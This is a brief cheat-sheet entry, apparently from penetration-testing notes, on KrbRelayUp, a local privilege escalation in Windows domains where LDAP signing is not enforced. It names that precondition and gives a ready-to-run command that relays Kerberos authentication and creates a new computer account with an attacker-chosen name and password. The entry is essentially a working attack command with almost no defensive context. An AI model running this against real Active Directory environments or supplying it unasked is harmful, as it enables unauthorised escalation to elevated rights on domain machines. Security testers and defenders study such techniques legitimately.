KrbRelayUp

A universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).

• KrbRelayUp

One of the requirements for this attack to work is for LDAP Signing to be disabled within the Active Directory environment.

# Escalate privileges using KrbRelayUp
.\KrbRelayUp.exe relay -Domain $domain -CreateNewComputerAccount -ComputerName $evilname -ComputerPassword $password